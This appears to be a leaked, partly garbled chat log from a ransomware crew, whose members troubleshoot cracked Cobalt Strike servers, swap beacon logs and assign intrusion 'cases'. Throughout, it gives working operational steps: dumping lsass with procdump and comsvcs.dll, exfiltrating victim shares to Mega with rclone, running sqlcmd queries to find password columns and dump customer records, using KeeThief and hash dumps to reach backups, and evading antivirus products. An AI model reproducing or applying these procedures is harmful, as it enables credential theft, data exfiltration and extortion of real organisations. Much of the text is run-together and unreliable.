stop reading all that revilian bullshit in safemode with command line support as i remember nothing can run except regular services in 10ka didn't check it is not true?i thought that in safemode aver is not started and you can kick it out by literally deleting the entire folderwhen you have access to kvm or the sphere, then yes, but as for sure not Komilfors F1 _) the server may just not come out of reboot, that's all there like in safemode user should enterthe clumsy method of bypassing avran through safemode)))) ``DTrump4ever
``what's so cool? https://xakep.ru/2021/04/08/dtrump4ever/
very cool, very! what exactly it grabs - shortcut or damag files should be tested careful with sofos, already in the second network grabs a lock like this:
machine without av - #1, from it we run the locker with the flak -p \\$machine #2\c$
and on the machine #2 where there is sofos, it pals it and does not allow to prolotatomsarmhasherpiperperry can read from the running processNot .ost archive with mail weighing gigabytes, but just a config\manipulation to open the outlook on a virtual machine and the mail is fresh loaded and could read it Is the outlook has a Linux analogue of the cookie? To steal some config to myself and read the mail
to not bother with chrome cookies \not to run into 2fa in the mailb*and in the spam filter mnu try to go to the mail see you can try to change the username, but then also the notification may comepochtimely yes I do not know clean it fits under the aforementioned, well then almost certainly will send
google what alerts there are in general there are errores/notificationssmtp and who to send it to and is it tied directly to the ovner's email?there are no alerts there, they are connected to the mailbox of the ovner? maybe someone had a problem with it, so try to avoid catching an alert. I haven't worked with this kind of thing, but I've seen HPE tapes a few times, the cassettes are cleared through the drivers Googling drivers for a couple dozen cassettes who worked with this thing?
Immediately after logging into a VPN and raising / session + backdoor already in the 3-4th case dropped out for good.
Do you have any explanation for this? As if there on the admin sonic straight alerts and then even a bonus cut off the VPN intentionally@all write to the confines where you need to reset the session for a sonic who needs to, if someone needs a locker or a new case - similarnovshe Hi :v: maybe someone has run into this problem with java? or tell me. did first by manu
```
https://www.linuxuprising.com/2020/09/how-to-install-oracle-java-15-on-ubuntu.html
```
The ppa repository didn't create it. Then i tried it.

```
sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A

sudo apt-get update

sudo apt-get install oracle-java15-installer

sudo apt install oracle-java15-set-default
```

out like this

```
root@kali:~# sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list
deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main
root@kali:~# sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A
Executing: /tmp/apt-key-gpghome.aOn8uUjdxO/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A
gpg: key EA8CACC073C3DB2A: "Launchpad PPA for Linux Uprising" not changed
gpg: Total number processed: 1
gpg: unchanged: 1
root@kali:~# sudo apt-get update
Hit:1 http://deb.anydesk.com all InRelease
Ign:2 http://ftp.debian.org/debian jessie-backports InRelease
Hit:3 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease
Get:4 http://ftp.debian.org/debian stretch-backports InRelease [91.8 kB]
Hit:5 http://packages.microsoft.com/repos/vscode stable InRelease
Hit:6 http://ppa.launchpad.net/linuxuprising/java/ubuntu focal InRelease
Err:9 http://ftp.debian.org/debian jessie-backports Release
  404 Not Found [IP: 151.101.134.132 80]
Hit:7 http://ftp1.nluug.nl/os/Linux/distr/kali kali-rolling InRelease
Hit:10 http://linux.teamviewer.com/deb stable InRelease
Reading package lists... Done
E: The repository 'http://ftp.debian.org/debian jessie-backports Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
root@kali:~# sudo apt-get install oracle-java15-installer
Reading package lists... Done
Building dependency tree
Reading state information... Done
oracle-java15-installer is already the newest version (15.0.2-1~linuxuprising0).
0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded.
root@kali:~# sudo apt install oracle-java15-set-default
Reading package lists... Done
Building dependency tree
Reading state information... Done
oracle-java15-set-default is already the newest version (15.0.2-1~linuxuprising0).
0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded.
root@kali:~# java -version
java version "15.0.2" 2021-01-19
Java(TM) SE Runtime Environment (build 15.0.2+7-27)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.2+7-27, mixed mode, sharing)
root@kali:~#
```

```
root@kali:~/Cobalt42_v2# ./cobaltstrike
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
```

```
root@kali:/opt/tomcat# sudo update-java-alternatives -l
java-1.11.0-openjdk-amd64 1111 /usr/lib/jvm/java-1.11.0-openjdk-amd64
java-15-oracle 1091 /usr/lib/jvm/java-15-oracle
java-1.8.0-openjdk-amd64 1081 /usr/lib/jvm/java-1.8.0-openjdk-amd64
```

I read that the problem is in the tomcat, I did not have it installed at all.

```
root@kali:/opt/tomcat# sudo systemctl status tomcat
Tomcat.service - Apache Tomcat Web Application Container
     Loaded: loaded (/etc/systemd/system/tomcat.service; disabled; vendor preset: disabled)
     Active: active (running) since Fri 2021-01-29 05:35:46 EST; 5s ago
    Process: 34567 ExecStart=/opt/tomcat/bin/startup.sh (code=exited, status=0/SUCCESS)
   Main PID: 34574 (java)
      Tasks: 30 (limit: 6977)
     Memory: 161.9M
     CGroup: /system.slice/tomcat.service
             └─34574 /usr/lib/jvm/java-15-oracle/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properti>

Jan 29 05:35:46 kali systemd[1]: Starting Apache Tomcat Web Application Container...
Jan 29 05:35:46 kali startup.sh[34567]: Tomcat started.
Jan 29 05:35:46 kali systemd[1]: Started Apache Tomcat Web Application Container.
lines 1-13/13 (END)
```

```
./cobaltstrike
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
Agent library failed to init: instrument
``they come on the tail of the link after the domain that adds the profileTurn off the profile xxxx.profile (aka trevor.profile)In general, the analyst sessions come from the profile of our https://pastebin.com/yB6RJ63Fкоторые pavel borisov and so on that for sessions kgbshnikhttp://www.domenburg.com/en/give the registrar of domains without docks for bitok except naimchipan ip servak that do not lomyaet through the domain reserchatopfy dohren sessions kgbshnikov poured, but in weblog them not, is it normal at all?[ ] (https://stylebrooks.com/group/general?msg=AoWMC9ZDEYra6fLyF) and I have the same, I thought someone from ours tests) look at the date of appearance of sessions it is not staging it just scan````
01/28 09:55:11 visit (port 443) from: 179.43.176.133
	Request: GET /admin/index.php
	Response: 404 Not Found
	Mozilla/5.0
````
I've got all the same ones like this
01/28 06:07:07 visit (port 8443) from: 168.119.77.163
	Request: GET /Gvh7/
	beacon beacon stager x86
	Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36

01/28 06:07:07 visit (port 8443) from: 168.119.77.163
	Request: GET /hIt8/.
	beacon beacon stager x64
	Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36

01/28 06:07:23 visit (port 443) from: 168.119.77.163
	Request: GET /qNm0/.
	beacon beacon stager x86
	Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36

01/28 06:07:23 visit (port 443) from: 168.119.77.163
	Request: GET /bApJ/.
	beacon beacon stager x64
	Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36

01/28 06:07:42 visit (port 443) from: 204.16.247.101
	Request: GET /lHu3/.
	beacon beacon stager x86
	Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36

01/28 06:07:42 visit (port 443) from: 204.16.247.101
	Request: GET /PTRg/.
	beacon beacon stager x64
	Mozilla/5.0 (NothingToHide; RightPenTester) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
I won't be here today, I'll look into it tomorrow. Don't worry, it's because the stepping was done via host, i.e. before if you scan domains no stepping was done, on 4.1 also had xxxxx profile, but it didn't come out this way, so it's probably not the profile either, i updated the listener completely via domain+4.2 and flew[ ](https://stylebrooks.com/group/general?msg=BoZDp6notprCAFiWm) we have the same one, when the whole thing came through the domain) i switched the listener to the correct one i got this problem when in fact i have a different one but the situation is the same!profilenow I'll find out what small profile[ ](https://stylebrooks.com/group/general?msg=cA98oC4F5asoCBJxg) more likely whitelist is needed. they are random virtuals\processes slutserversion timserversion alonetoday it looks like in 199 there is no such a dependence in the 104 band checked + 1 give minutes, the russian come and go with the ssr also
1v1 pictureWhen we were given version 3.0 back in the year, there were already analysts flying in
01/28 03:46:14 *** new ssh session ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:16:16 *** initial beacon from ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:46:17 *** new ssh session ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 04:58:13 *** initial beacon from Administrator *@172.16.1.113 (WIN-3AI1DIQI7NN)
01/28 05:16:19 *** initial beacon from ryabov *@72.73.77.9 (AILOV-76510F7BEC)
01/28 07:46:40 *** initial beacon from vasiliy *@82.69.71.9 (ASIM-28C7A0185)
01/28 08:16:42 *** initial beacon from vasiliy *@82.69.71.9 (ASIM-28C7A0185)
01/28 08:46:44 *** initial beacon from sidorov *@82.65.84.9 (ASOV-3EFCDFBD74)
01/28 09:16:46 *** new ssh session sidorov *@82.65.84.9 (ASOV-3EFCDFBD74)
01/28 09:46:48 *** new ssh session sidorov *@82.65.84.9 (ASOV-3EFCDFBD74
```
This is just for today, Moscow time. Change the channel to RenTV.
conspiracy, theory, masons - what awaits us with the new update cobalt :) if there will be no false sessions - it means it's in the cob 4.2
and there are no options there 4.2 version without hookup
sit back to wait for a hoster to get a cob 4.1mechanics how to check it just so and why?
have you seen the logins of other users on your timeserver?
when you connect to a timeserver as a client, authentication data could leak out to the left or some dumb hdv and why does it do that?[ ](https://stylebrooks.com/group/general?msg=6n5utLviu44RCXCFk) when you start the listener, it sends information about them somewhere. what is the secret tab? there could leak data from timeservers you connect to, like blackheats and software - back up!ovner maybe pawned himself =) i asked about the bookmark) like yes it was on the cobalt 4.2 began to happen, no? and by the way the searchers usually come upon a grid mess, find the paiload, begin to investigate
i've never seen a session fly right after the listener went up and it's a pain in the ass to take registrars' accounts and transfer level 3 domains to my own backend
it's possible to "hide" that's how to do it in different places where you can't pay with bitcoins only
it would be good to have a script for whitelisting sessions and unpacks. like, if a session came in - let it go
```
in #cobalt_cna_scripts there is blaclist[ ](https://stylebrooks.com/group/general?msg=QqDS3SJWEfDu4mup9) through nymchip took as well as our hosterv kobe)periodicallyweb logs of webservers you already see, before the hoster I myself bought servers in different places, domains and setapil everything, the same analytics would fly over and look logs of webservers, who has ssx on the server have gaps or not?and they were like, ok, so the domain is not for malware and they will go on and on
you have a session whitelisting in blacklists, probably immediately after the registration of the domain to do it on the fly, but the troublesome arranging a wild script would be nice to pump some whitelisting sessions / ipaks. like came the session - to let her not to let him sam kobalt by the way have not checked for bookmarks? you can look at the web servers, if they are available
if a pile of requests comes right after you release apache/enginx, the reserchers probably know everything beforehand, someone in AV company figured out how to automate it and that's it.
the server and 2 procl at another registrar for the sake of experiment and look - if it will not bang with the same profile, it means that the registrar leaks and yes, the server just set up, setup the listener and the session went a sample shellcode they have, I have a conspiracy theory and still do not care, but my profile is not the same as Vastoni, Technologist, Red - do you also take it there?I order from our hoster is unlikely it has any effect on anything) dishonest? i myself am curious but have not got time to dig around) most likely it's about the profile, yes
the server response type in the scan to the client ask viola he will explain in more detail) something fishy it's all, I thought it only nastiak you have a session rises
one thing is just a web redirect comes in the coba, another thing is when they bring up a session to you on the domain that did not show up anywheretypes scan and poke then statues collect botnu alt said that all newly reg domains reserchatnu is clearly one and the same group reserchers, how do they knit newly reg domains and comes knockout to paiload that was not used?we also have two servers attacking clean, domains because they are new in the padding, so analysts are attacking them to collect status on cobaltprofile k2 use ?@alter how can this be ?all sorts of kgb makarovs are knocking around and the server is also plus or minus new and nowhere to show upxxm, we have the same fuck with cobalt, for at least a week now and again i have beacon released the dll; and here new ssh session, and what does it mean and from where is not clear never happened before to garbage after checking rantime all i did was check the dll on dyncheck for windef and sophos rant, and that's it)and the server and the pad are new; i just bought and started the timserver
01/28 05:07:58 *** initial beacon from mihailov *@70.9.51.51 (ROLOV-49C20F4489)
01/28 05:37:59 *** initial beacon from mihailov *@70.9.51.51 (ROLOV-49C20F4489)
``I keep getting some garbage spawned and immediately die; everywhere new ssh session and russian surnames````
01/27 21:11:55 *** new ssh session makarov *@70.9.50.56 (EDOR-1B5C7CDB30)
01/27 23:44:39 *** new ssh session sobol *@68.69.70.9 (OR-18714C2795)
````mozhetku tell me, run timeserver, server itself is new, linux also; the file has not loaded anywhere po rocket fell? @rozetka thanks will try Although it may work for the context polzak, then impacetto if psekez.ru with hash and there interakt shell be
long time ago i used to use the read function copy the code of the hashpowershell[ ](https://stylebrooks.com/group/general?msg=j5mH5nHMqc8XNAbmt) psexec \host -s cmd thank you, it worked!@rozetka tell me how to psexec pozhtaa, this is really useful, if there is no gui.... also through psexec was started and dumped, if the database is opennu there already who likes whathttp://github.com/GhostPack/KeeThief/blobaster/PowerShell/KeeThief.ps1
powershell ISE can still export the CSV with the CSV codeNow it's open, you kinda passed the authorization)) so easy)) try it in the keepass itself ?File-export and there where you want to golf Access to gui ? @all help @green
urgent question nid help! tell me how to dump open keepass having access to tachkeda and allbatnik strtani through gpon viam 445 open , access denied all accounts or everything is also nada? on viam, anything open? not through default psekez vmik staszkili to it?
Who knows about GPOs?
Got the rights yes
There are two machines on the network - the Veeam server and the IT guy's machine

The task to get to them
The IT guy is completely closed (hostname by name detected, pinging, but ports are closed)

What options are there to get shell on the machines listed above?
In fact, the whole case is stuck in this place.and the native task manager is not removed or what? @red will share with the lambchop? I think we will need ... @all call back who in the near future will need to distribute/execute the file
there is an upgrade-automator that requires testing by the userr then kz how to dump it so i dont even have a local admin *rukalytso * yeah and throw plz output whoami /rriv either because yuak blocks or kzto that cilance does not palit it exactly, but we through shel did not go, because privilege debugtam not work recompiled libs to work with winapi
to unhook the engine cilansadumper2020 approuvedCMD software from the folder where the ehe lies openprocdump64.exe -ma lsass.exe lsass.dmpprocdump will cut the lsass even wonder if it will work or notsam compiled yesterday all night fucked try to run from ndp from admintaskmanager even not from adminnu we ended up not removed, but if you ndp there is a chancerundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\programdata\intel.log full
mimoshes funny1111 we've been fucking around for 3 or 4 days lol enjoy it) rdp local admin :) ahahaha no session how do i unload the lsass from the pc where the cilance is ?Pass in config is encrypted in b64 kind of way, so config is better to generate it separately somewhere through rclone config, then just copy it. how can you specify pass from config file? *Mega is a cloud storage and file hosting service known for its security feature where all files are encrypted locally before they are uploaded. This prevents anyone (including employees of Mega) from accessing the files without knowledge of the key used for encryption.* In general, as I understand the files are all encrypted locally before they are uploaded, so there is no need to make encrypted archives.then with the same wmic you can check if the process is running, if it is, it works ok wmic /node: "HOST" /user: "home_log" /password: "passport" process get description,executable convenient to feed the necessary files via sms to remote hosts, and then wmic startconfig after generation can be placed near exe and run it with parameter --config, for example rc.exe --config C:\Users\Administrator\rc.conf copy "C:\Users\Administrator\" mega:data, remote is the name of config, which you generate through rclone config, if the name of config you specify for example mega it will be mega:data,` guys, I tell you how to use rclone:
1. download the program itself (posted in general), create a file rclone.conf and put it in the same folder with the exe
2. Next, open the kmd from the admin, go to the folder where the program lies with the configuration file and run the command: rclone config
3. Then pop up menu, where we create a config (roughly speaking, roll in the gods mega), after the gods rolled in, the program writes them to the file rclone.conf, in encrypted form.
4. Take this rclone.conf file and the program itself and put it on the host from which we are going to download the information.
5. Fall into the cobweb into the folder where you put the config and the program and run the command:

shell rclone.exe copy "\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

Well, I think it is clear here, what is in quotes is what we download, we can specify anything, even the whole disk
remote - the name of the config file you specified in step 3, data - the folder in the mega, where the info is downloaded
Thank you ``so naturally).confgenerate usually on their virtualtoolkot you and silent installation and next to lay and startconfig generate manuall on silent installation pklon? @all no one wrote a query yet automatic database mssql ? query the database, tables and a couple dozen lines of the first 25-30 most live would be very helpful ...but I sit by the way with the web, all ok ( browser Opera )[ ](https://stylebrooks.com/group/general?msg=roaTx9kZx6Yqmw9YA) and now with proxychains \ proxychains4 can the same stuff, I have to reload the page if you see that there are new messages ... web version with thor sadness sadness
the appa is ok. you can proxy it (it used to be possible)[ ](https://stylebrooks.com/group/general?msg=3v2TAiW78aF9qvLYq) i have the menu always hidden, clearing cookies helps, but it goes around, the web version seems to be unstable i have everything ok. why rocket so fuck tweeter who is this and my batts also there part of my kobu who is this@all https://twitter.com/AltShiftPrtScn/status/1350755169965924352
change the mallable profile господав desktop without bugs works fine through the web version bugs were before the server update, the desktop version is all ok[ ](https://stylebrooks.com/group/general?msg=LxJGLqnzMJGsdSYkn) I was also offered to update tor, and then restart + click on the scoop to clear the then if the web browser cache cleanse mb help Restart did not help, the same bug.me all ok...helped, thanks) i had the same, restart toruspisk in place i had the same problem with the restart of the torispisk, but i got kicked out of the chat. forced logout.((guys, all normal rocket work? i sit through the web, and i have a bug list of chats on the left and disappears in a second it will rip, about restore i do not know have tried deleting backups from the central viam where the button delete backup from the drive - it then rip is removed and will not restore? slice + @all All Who WORK WITH SONICWALL's
Please, when I upload new dumps take them AT ONCE, because web-sessions for authorization tend to run out fairly quickly, as soon as I download the archive with sonic - immediately try to get if there 2fa, first just via vpn - if the code falls out - then climb through the web-session in the admin and look whether there rndp or something like that to start upbro I was sick, do not know anything@all wrtdesign.i can't see the confab, there are fresh sessions with sonic from there we're streaming) subscribers were not happy with the old chat room (pun intended, bro) "like" likes all now there will be twice as many locks with this chat roomintuitively everything is clear and nice smiley:update passed and should be faster beautifully)@all UPDATED@all the rocket update will now
a little delayed a little bit) don't give a shit :joy:= )just kidding) m? la the feds are upgrading the sniffer again @all it's time to upgrade the rocket
don't be scared) it will go back up in no time) @all THIS IS IMPORTANT
started noticing crookedly configured listener in other people's cobalt
it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager)
if you write ipac with htts host (Stager), the shaping process goes "bypassing" the SSL certificate which is on the pad - which is FUCKING and adds blockages by phasers if you have viam, check it, it should be there...i know viam has one, but a third party, you need to look.... da, like a viewer for the tank? no, there is some guye tool which goes straight to the tank to look
I just forgot the name completely(((shell sqlcmd@allHi, can you tell me the utility that sql .hello, could you suggest a utility that opens the sql . bak file@all today I'm distributing cases for work, who is not busy - write to your teammates and we'll watch ipnchiki sitelefantа you can also use maxtom browser router from the soul you can use desktop client we think so bypass the server from which you try to get in the date put January 1, 2021 guys, salam, urgently, how to bypass the old version of adobe to get into the scope ` ` `https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/
```
nice article about lateral muvGetting access to the server with Shadow Protect SPX (StorageCraft) backups
```
==
1. Log on to one of the servers via RDP, in my case is the SQL server.
2. On the desktop, we see the icon of ShadowProtect SPX
	-> click on it.
3. the GUI opens (if you are prompted for credentials, enter the credentials under which you signed in via RDP, or any other software)
4. On the left side in the "Job Summary" block you will see the detailed description of backup scheme
	In the "Name" field - backup name of our server
	in the "Destination" field - place WHERE our spx stores backup copies, as BACKUP NAME (BALL WITH BACKUP ON THIS SERVICE)
		From our example we can conclude that all backup files are stored in a ball named StorageCraft, and the folders with backup servers are named with the name of the server itself.
5. Knowing the name of backup server, we want to get more information about his structure, the first thing we do is to get a balloon with the command "cmd.exe> net view \\\COH-DSS3 /ALL", in response we get "Error 5: Access Denied".
6. No access, trying to bang on the accounts of other people - the answer is the same - Error n 5, it would be logical to assume that in order to gain access to the server, we need either the credentials of the local admin on this very server, or account of a special user with special privileges
7. Let's assume that if it is a dedicated user, he has a similar name to the software/function:
	we go through the logins with substrings (here we need to get fancy):
		Storage
		Shadow
		Protect
		Craft
		SP
		SPX
		Backup
		BUUser
		ETC.
	Then do a search for ntds.dit (hashes.txt.ntds) to find the hash, in my case, the search was successful and I found the user Humanity.local\SPAdmin (I think it is clear that it is Shadow Protect Admin) and its hash ce31b806821bec116ba03132ab5b3138, but unfortunately, search on cmd5.org not result and I desperately need the clearance. (If you have enough hash, congratulations - you got the result.)
8. But if you still need a clipart or you can not find the right user, we understand that if the software somehow knocked on the server, she knows the credentials, which means they can stay on the server.
	Try to dump hashes
	Here I will not describe in detail how to do it, but you should try hashdump (and its legitimate analogues) and logonpasswords (and similar)
	In my case I used mimic and saved the passwords and found the clirapass from my SPAdmin account - kerberos:
         * Username : SPAdmin
         * Domain : COHBackup
         * Password : Backup!User
    (in my case for some reason the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace it with your own value))
9. Going into Explorer, and open through it the necessary sphere "\\COH-DSS3\StorageCraft" at me asks for credentials, I enter COHBackup\SPAdmin and Backup!User and successfully get access
10. Also in some networks backup servers can be a few, as an option to check this, is to click on the button Backup in the upper left corner of the gui (just after File) then Destinations -> and we will see what is the way to save the backup
===
Not sure if this method will work for everyone, but in my case it worked, good luck!
``Githab Links can add a forum section where you can drop off useful sites, links, articles, etc@all I often go to everyone today, which is unusual, but one more announcement.
i wish to collect some pool of similar documents in public access so that everyone could read them, they often describe fairly standard things, but it's useful to know them allInject into sqlserv.exe process or any other process run from under this user when working with databases you need either creeds or skl token of service user on the database server yes, here is the instruction if you do not have on the whim
```
1. Display all the databases on the server in kmd
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
	You can also add a port

1.2. to view a non-standard port from a skullserver, you need to type | shell netstat -abno | = scan ports and services on them through the cobald
	there you find the port | sqlservr.exe | is running on and specify it after localhost like this - | localhost,12345 |

	1.2.2.Display in kmd all databases on the server with size in megabytes
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"


2. Unload the 100 most saturated tables in the database by number of rows, number of rows and size of tables on disk
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;"

3. Counting rows in a specific table of a specific database
sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;"

4. Unload the first 10 records in a specific table of a specific database
sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;"
sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W

5. Search by column names in a specific database using %pass% as an example
sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';"

6. Dump the contents of specific columns from specific table into txt file on hard drive in folder (in this example by number value of table > dates
sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt"

7. Output all tables of a particular database
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W

8. Backup database
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"


for remote/other local server change localhost to ip,port
alternatively localhost,%port% (watch netstat)
+
9. to choose a non-standard port for the mscl, type ip,port = localhost,52541 example
+

``I'll either add something myself or ask the guys @tony to write a topic there, make a request instead of password, put any other key
and the variable %databasename%Search by column names in a particular database by the example of %pass%
```
sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';"
``Forum is great, I personally lack detailed information on working with skl databases only, with examples of tables and records that interest us@all about the forum, write friends, do not be afraid to say or ask stupid, usually if someone has a question - it will probably be several other people, and having it written down for all will be usefulkalinkaGentlemen, who used Headless Burp and can help, write in PM, please.mine added@all standardpro.com whose case? where's the conf? @all who wrote asked to cut the forum - duplicate in private now in half an hour will doPisplayed in pm.@all guys hello, I remember who wrote about copying pklon information from the mega to the dedic, write to lps there are a couple of questions who did so today this rocket will probably fall off a few times, it is planned if anything, do not worry all hello.++++:v:hello
The structure is as follows.
The current squad is divided into groups, each group is assigned to a team leader (one or two, depending on the size of the group).
Ateam - team leader rozetka
Bteam - team leaders red and ali
Cteam - team leader steven

Team Leaders' area of responsibility includes:
1. Issue cases for work
2. Teach, advise, mentor.
3. Connect in the process of solving atypical or unprecedented tasks
4. Help with builds of loads, fixing in the network and other technical questions concerning the software.
5. Provide the necessary guides and manuals.

The working group is required to:
1. Listen to
2. Watch
3. Doing
4. Learning
5. Asking questions
6. Follow guides and instructions, complete tasks

The approximate rules of procedure are as follows.
- Received the session
- Captured primary data
- Create a channel in the rocket (all have this feature), the channel name is the full primary domain case (eg google.com microsoft.com), add me + your group teammates there
- Fill the channel with primary information according to a given template (the domain adfind output, the list of domain admins, foreign admins, local admins, kerberos hashes, seatbelt output, sharefinder output, etc.)

We work from 15 to 01
From 19 to 20 we have a public debriefing in the discussion channel. Any questions of technical nature there too. On organizational questions - write to personal.
``mrFlintstonesstakanbradtwinalexstevenredgreenwhiteAndyflyAraratmagaalialterrozetkaShvedmichaelgiovannisamueldlit would rub...and do not pliz leave it on the dll if there is an option not to do so btw accepted.If the session injected into the process - it will not fall
if you leave it on the dll - it crashes after a few hours
while these are observations) I checked on a couple of servers - there was no reboot, but the session fellaprobesthe next time, as you restore the session, look how long the computer is running, something like this:
` `(Get-Date (Get-Process explorer).StartTime).ToString('yyyyyMMdd')[ ](http://wfy76wigkpoxqbe6.onion/group/cobalt_v42_patched?msg=xu2Q4qYAAed7PbQ7S) As I understand it separately in some networks, apparently something in the iron I had 2 times, on several machines in 2 networks ... but perhaps, as noticed - was restarting the servers, I did not watch the life of the computer[ ] (https://stylebrooks.com/group/cobalt_v42_patched?msg=3Fe4AGJ8mLf4nfGnm) was such, when a big slip put for 10 minutes from sleep mode returns. on vorkstantsyya possible, servaki usually reset dies, it is in memory but the technologist asks about the otherReal after restarting the computer session should die?) a follow-up question - how to remove jitter 300 seconds? i got tired of accidentally dumping my session to a slip and in 3 or 4 hours the session crashes. does anybody else crash sessions at night for no reason?zvhhitechTyrara senkeeset file security, sugnature - win64/rozena.ICt just what's here@barabulkaVanoATXGrimnir on 2016 server the dll ran, everything okhttp://dyncheck.com/scan/id/0e85df67f128617619f46255d62b1a1e
1/23
AhnLab V3 Light of some kind is giving dynamite detection checked on dyncheck dll x64 on 2008 crashes eheCodeocta0dayinbizhttps://dyncheck.com/scan/id/5b13716a94a301b0faef2dd60ef09b07#collapse_infoокточки input for dll

```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``@all working update
I think I need to test it on vin 10 and fix it on 7, same story on 12, same story with both folders tested on 2016 server x64 without AB
i also noticed the size of the dll itself increased 4 times compared to the dlls from the previous artifact
x64 as well as x86 is much better than previous artifact.
360 Total Security Essential palitoto here take it down? if so - add it in the new confuA how is the situation here? i do not understand in the other rocket i do not see this case i know i have it, but i do notprivet, and when we and alex will be given the dedicates and servers for the msf? We're waiting foroxox I'm about two months away
Fuck.
Fill it up and I'll delete the room.
we're stuck in old records, nothing's been uploaded yethttp://www.veeam.com/exagrid-storage-solutions.html
who has dealt with such a thing? it seems likehttp://www.carbonblack.com/блек some othertosofos not so evilsantinelcylantecsimantec palitosofos - simantecHello all
advise AV, the utilities are the most evil that stinks everything
for the testovaa von, got the spvc thanks the output should be something like this :
``beacon> shell net helpmsg 5
[*] Tasked beacon to run: net helpmsg 5
[+] host called home, sent: 44 bytes
[+] received output:

Access is denied.
``you forgot the shell in the commandb> net helpmsg 1326
[-] net error: argument 'helpmsg' is not a net commandnet helpmsgnet helpmsg (# errors)and so is 67 writes[-] could not open \kumerafil2\c$\*: 13261326 and 67 what does it mean who knows the error codes in the cob? +http://rus-linux.net/MyLDP/consol/7z-command-switches.htmlпосмотри. maybe there will be something here if I am not mistaken usual 7zip can be used as a portable, I downloaded the usual and a folder of 5 files dragged to different cars everywhere workedconsolehttp://portableapps.How can you check if trust is alive or not? if it's not worth the hassle ? on his cludes and in general azur has something that if you deleted it can be restored in some time ? look systeminfo
